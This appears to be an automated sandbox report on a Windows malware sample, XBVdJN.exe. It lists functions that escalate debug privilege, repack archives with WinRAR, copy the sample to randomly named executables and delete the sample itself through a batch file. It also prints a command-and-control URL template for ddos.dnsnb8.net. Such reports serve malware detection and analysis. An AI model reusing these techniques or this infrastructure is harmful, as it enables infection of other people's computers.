Opcode ID: 0411772ceab8fe8f8ab4a950da42e3b69506bef7116778690682dc8f4b0badf0
Instruction ID: adc04cc6d33c43536ef332b608608e42f24798f864050a2dde2602ff0fc239ea
Opcode Fuzzy Hash: 0411772ceab8fe8f8ab4a950da42e3b69506bef7116778690682dc8f4b0badf0
Instruction Fuzzy Hash: 3E118F76A00649CFCF318E58CC817DD37A2FF04301F6D4528EE499B391DAB16A81CB94

Non-executed Functions

Function 0061119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
CloseHandle.KERNEL32(006113EF), ref: 006111FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203

Strings

C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006111A5

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
API String ID: 75692138-1113178309
Opcode ID: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
Instruction ID: 6f18135594e1f7a0df20ab76b18cc6bb71d03768579fc764d29619b51f6aa1a3
Opcode Fuzzy Hash: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
Instruction Fuzzy Hash: 0101D675900219EFDB00DFD4C989AEEBBBAFB08345F14856AE606E2250D7715F849B50

Function 0061139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006113BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448

Part of subcall function 0061119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
Part of subcall function 0061119F: OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
Part of subcall function 0061119F: AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
Part of subcall function 0061119F: CloseHandle.KERNEL32(006113EF), ref: 006111FA
Part of subcall function 0061119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203

Strings

SeDebugPrivilege, xrefs: 006113D3
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006113A8

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SeDebugPrivilege
API String ID: 4123949106-3984717035
Opcode ID: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
Instruction ID: c966b6fd8088b1b5583bffa806a919246786e2cd91d8e1efbb9f7041a00d03b2
Opcode Fuzzy Hash: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
Instruction Fuzzy Hash: DD31A471D00219EADF20DBA5CC45FEEBBBAEB46704F14406AE714FA241D7309E85CB60

Function 0061239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 006123CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00612464
GetFileSize.KERNEL32(00000000,00000000), ref: 00612472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 006124A8
memset.MSVCRT ref: 006124B9
strrchr.MSVCRT ref: 006124C9
wsprintfA.USER32 ref: 006124DE
strrchr.MSVCRT ref: 006124ED
memset.MSVCRT ref: 006124F2
memset.MSVCRT ref: 00612505
wsprintfA.USER32 ref: 00612524
Sleep.KERNEL32(000007D0), ref: 00612535
Sleep.KERNEL32(000007D0), ref: 0061255D
memset.MSVCRT ref: 0061256E
wsprintfA.USER32 ref: 00612585
memset.MSVCRT ref: 006125A6
wsprintfA.USER32 ref: 006125CA
Sleep.KERNEL32(000007D0), ref: 006125D0
Sleep.KERNEL32(000007D0,?,?), ref: 006125E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006125FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00612611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00612642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0061265B
SetEndOfFile.KERNEL32 ref: 0061266D
CloseHandle.KERNEL32(00000000), ref: 00612676
RemoveDirectoryA.KERNEL32(?), ref: 00612681

Strings

-ibck, xrefs: 006125BA
C:\Users\user\AppData\Local\Temp\, xrefs: 006123B1, 006123B6, 006124CD
%s X -ibck "%s" "%s\", xrefs: 0061251E
%s\, xrefs: 0061257F
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 006125C4
%s%s, xrefs: 006124D8

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-774930870
Opcode ID: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
Instruction ID: d29305a30d1c4d73ae4f2543459749953b0431b80296214518ce14a78aefcb7c
Opcode Fuzzy Hash: e5833b98aa60d7829c58d26d02b4704d7dffe51190f0019bc68034e01adacbcd
Instruction Fuzzy Hash: 5981EFB1504305ABD710DF60DC48EEBBBEEFB88705F08491AF645D2290D7709A898BA6

Function 0061274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00612766
memset.MSVCRT ref: 00612774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00612787
wsprintfA.USER32 ref: 006127AB

Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
Part of subcall function 0061185B: rand.MSVCRT ref: 00611894

wsprintfA.USER32 ref: 006127C6
CopyFileA.KERNEL32(?,00614C80,00000000), ref: 006127D4
wsprintfA.USER32 ref: 006127F4

Part of subcall function 00611973: PathFileExistsA.SHLWAPI(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 00611992
Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
Part of subcall function 00611973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00611A46
Part of subcall function 00611973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00611A65

DeleteFileA.KERNEL32(?,?,00614E54,00614E58), ref: 0061281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00614E54,00614E58), ref: 00612832

Strings

%s\%s, xrefs: 006127EE
\WinRAR\Rar.exe, xrefs: 00612793
C:\Windows\system32, xrefs: 006127E3
C:\Users\user\AppData\Local\Temp\, xrefs: 006127B6
%s%.8x.exe, xrefs: 006127BB
c_31892.nls, xrefs: 006127DE
%s%s, xrefs: 006127A5

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3099098879
Opcode ID: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
Instruction ID: 99ddcd6f3c82f4a4693d06aa8e122afffab516f0324024e02aaa2eb2293fad81
Opcode Fuzzy Hash: 15e9dd4a0b9731c3da93ed45c0e02bc8acf8e0dc5e159c636082fd85638452fd
Instruction Fuzzy Hash: 1521A7F694022C7BDB10EBA49C89FDB77AEDB04745F0944A2B605E3141E670DFC48AA0

Function 00611581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0061185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
Part of subcall function 0061185B: srand.MSVCRT ref: 00611878
Part of subcall function 0061185B: rand.MSVCRT ref: 00611880
Part of subcall function 0061185B: srand.MSVCRT ref: 00611890
Part of subcall function 0061185B: rand.MSVCRT ref: 00611894

wsprintfA.USER32 ref: 006115AA
wsprintfA.USER32 ref: 006115C6
lstrlen.KERNEL32(?), ref: 006115D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 006115EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00611609
CloseHandle.KERNEL32(00000000), ref: 00611612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0061162D

Strings

open, xrefs: 00611627
C:\Users\user\AppData\Local\Temp\, xrefs: 00611599
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 006115C0
%s%.8x.bat, xrefs: 006115A4
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 0061158A, 006115B3, 006115B8, 006115B9

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XBVdJN.exe$open
API String ID: 617340118-2664338557
Opcode ID: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
Instruction ID: 682dd6be1649bc4cf1145427bd67510adcabb956e54ac084ab20c58eadce3696
Opcode Fuzzy Hash: 599c55488f01ca2a130f29a4e2ee38253271e9c739d5482064136c43223fe9b5
Instruction Fuzzy Hash: 77119476A011387ED720D7A49C89DEB7BBDDF19311F080052F94AE2240DA709BC48BB0

Function 0061120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00611400), ref: 00611226
GetProcAddress.KERNEL32(00000000), ref: 0061122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00611400), ref: 0061123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00611400), ref: 00611250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 0061129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 006112B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,00611400), ref: 006112F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00611400), ref: 0061130A

Strings

ntdll.dll, xrefs: 00611219
ZwQuerySystemInformation, xrefs: 00611212
C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 00611262

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2647507469
Opcode ID: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
Instruction ID: 985721c64ea5cc395d24c478363774f2c887ad37c5db5a3bdf41059701d51842
Opcode Fuzzy Hash: ab977b0bf03033fcf6d4b8769805b82876ed538d935d0c29cc7465caab51d712
Instruction Fuzzy Hash: 3F21D771605361ABD7209B65CC04BEBBAAAFB4AB01F184919F646DA340C770DBC4C7A5

Function 0061189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006118B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006118D3
CloseHandle.KERNEL32(I%a), ref: 006118E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 006118F0
GetExitCodeProcess.KERNEL32(?,?), ref: 00611901
CloseHandle.KERNEL32(?), ref: 0061190A

Strings

I%a, xrefs: 006118E0

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%a
API String ID: 876959470-1380773492
Opcode ID: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
Instruction ID: cde36df8c25317c441865b7b1ab77e7c391a828d342c310b196f82e5228e60da
Opcode Fuzzy Hash: 8a20773ffe8ef1e38377cc4d2965ed3136cfa0f98957d7a39b01080fbd3c7590
Instruction Fuzzy Hash: 3A017176901128BBCB216B95DC48DDF7F7EEF85761F148022FA16A52A0D6314A58CBA0

Function 0061185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00611118), ref: 00611867
srand.MSVCRT ref: 00611878
rand.MSVCRT ref: 00611880
srand.MSVCRT ref: 00611890
rand.MSVCRT ref: 00611894

Strings

http://%s:%d/%s/%s, xrefs: 00611860
ddos.dnsnb8.net, xrefs: 00611862

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
Instruction ID: c1b5b4cf5bb4b794c46a5da15c6d932d7a54522c4de6e93580757275ac153ae0
Opcode Fuzzy Hash: 5b2a3ba0cc0e8a45e92f6f89c7fdc23e68e34c608cc2efe2e1651b208a42e24a
Instruction Fuzzy Hash: 55E0D877A00228BBDB00A7F9EC468DEBBECDE88162B140567F601D3350E570FD448AB8

Function 00612692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006129DB,?,00000001), ref: 006126A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006129DB,?,00000001), ref: 006126B5
lstrlen.KERNEL32(?), ref: 006126C4
??2@YAPAXI@Z.MSVCRT ref: 006126CE
lstrcpy.KERNEL32(00000004,?), ref: 006126E3
lstrcpy.KERNEL32(?,00000004), ref: 0061271F
??3@YAXPAX@Z.MSVCRT ref: 0061272D
SetEvent.KERNEL32 ref: 0061273C

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
Instruction ID: e3b1c58b3940e7abda374c4e77bbbd2e0fdc09e083f16dbacfa785d18bee4ec2
Opcode Fuzzy Hash: 033bb5bc089729a6c342191777390dd8429d2f4298f9d39c64f25a78ad29ca7e
Instruction Fuzzy Hash: AA117C35900111AFCB219F15EC588DA7BABFF8476171C902BF455C7260DB308995DB90

Function 00611B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00611BCD
rand.MSVCRT ref: 00611BD8
memset.MSVCRT ref: 00611C43
memcpy.MSVCRT ref: 00611C4F
lstrcat.KERNEL32(?,.exe), ref: 00611C5D

Strings

.exe, xrefs: 00611C57
ygXvIMcqsaxXqKEBzmehMnFdOUDHSuddhfoLNTIrVrbZUqEYtGWmJHTwCgbwJfjNbAlFuTtDVROuDJaRBnkmzxigQSOAyrESjPGIhevCWWpUiLYCBvZAQHLjQPckKPwVifoplsznxtRpeMacsZoNyXlkGYKF, xrefs: 00611B8A, 00611B9C, 00611C15, 00611C49

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$ygXvIMcqsaxXqKEBzmehMnFdOUDHSuddhfoLNTIrVrbZUqEYtGWmJHTwCgbwJfjNbAlFuTtDVROuDJaRBnkmzxigQSOAyrESjPGIhevCWWpUiLYCBvZAQHLjQPckKPwVifoplsznxtRpeMacsZoNyXlkGYKF
API String ID: 122620767-3976719805
Opcode ID: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
Instruction ID: ecb8549ff3b7afa9f0a006c442787cc1df0b38573a911927a68794d2c5b03a3d
Opcode Fuzzy Hash: a8fc8e844b9c1b2fc0f9613b993873091971a75911fa9791c0df29325a856514
Instruction Fuzzy Hash: 7521A032E481A06ED75513357C41BED3F478FE7711F2E909AF6861F3B2D56809C682A4

Function 00611319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00611334
GetProcAddress.KERNEL32(00000000), ref: 0061133B
memset.MSVCRT ref: 00611359

Strings

NtSystemDebugControl, xrefs: 0061132A
ntdll.dll, xrefs: 0061132F

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
Instruction ID: 78a7aec5fdf026b9ac8cb92c97bdedef9be55be53ea7163f3b40c93f0e5bfd36
Opcode Fuzzy Hash: 51e527ade14706774fe669877adbc859691ee54b1697698487eb4aa8e2dbdc1c
Instruction Fuzzy Hash: 6801C47160034DBFDB10DF94EC859EFBBBAFB05304F08452BFA12A6240D7708685CA90

Function 00611DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00611E0B
lstrcpy.KERNEL32(?,00000001), ref: 00611E1C
strrchr.MSVCRT ref: 00611E2B
lstrcmpiA.KERNEL32(?,00614488), ref: 00611E48
lstrlen.KERNEL32(00614488), ref: 00611E53

Memory Dump Source

Source File: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
Instruction ID: 70c8c8ec320e6e42b55024cf691f3d360f9a00e9c5fbcbf0844b3361ca4f8d26
Opcode Fuzzy Hash: bee0c466b6ea2f0bd31487d03acc8b04de4645deb6edd15fd5af5ef48e315a9c
Instruction Fuzzy Hash: FD01FE729042696FEB1057A0EC48BD67BDEDB05311F0C4067DB46D7190EA749AC4CB90

Function 00616014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0061603C
GetProcAddress.KERNEL32(00000000,00616064), ref: 0061604F

Strings

kernel32.dll, xrefs: 0061603B

Memory Dump Source

Source File: 00000001.00000002.2443115264.0000000000616000.00000040.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true

Associated: 00000001.00000002.2443048248.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443066507.0000000000611000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443084694.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2443101466.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_610000_XBVdJN.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: 920401851291069f47bc996d62c2fe92e70689a7150833ea92fecf21b10b095d
Instruction ID: 71c40daf84fa9db84eb83f6602c50a9cf279caeb9d543895bd2a8f9da7b95c67
Opcode Fuzzy Hash: 920401851291069f47bc996d62c2fe92e70689a7150833ea92fecf21b10b095d
Instruction Fuzzy Hash: 3CF0F0B61402898FEF70CEA4CC44BDE3BE5EB15700F54442AFA09CB281CB788685CB24

Analysis Process: winsvcs.exePID: 2784, Parent PID: 6732COMMON

Execution Graph

Execution Coverage:	13.6%
Dynamic/Decrypted Code Coverage:	8.5%
Signature Coverage:	0%
Total number of Nodes:	1272
Total number of Limit Nodes:	29

Executed Functions

Function 0040B517 Relevance: 852.7, APIs: 470, Strings: 15, Instructions: 3992windowtimethreadCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000007B), ref: 0040B567
GetClientRect.USER32(?,?), ref: 0040B578
MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001,?,?,?,0000007B), ref: 0040B59E
InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,0000007B), ref: 0040B5A9
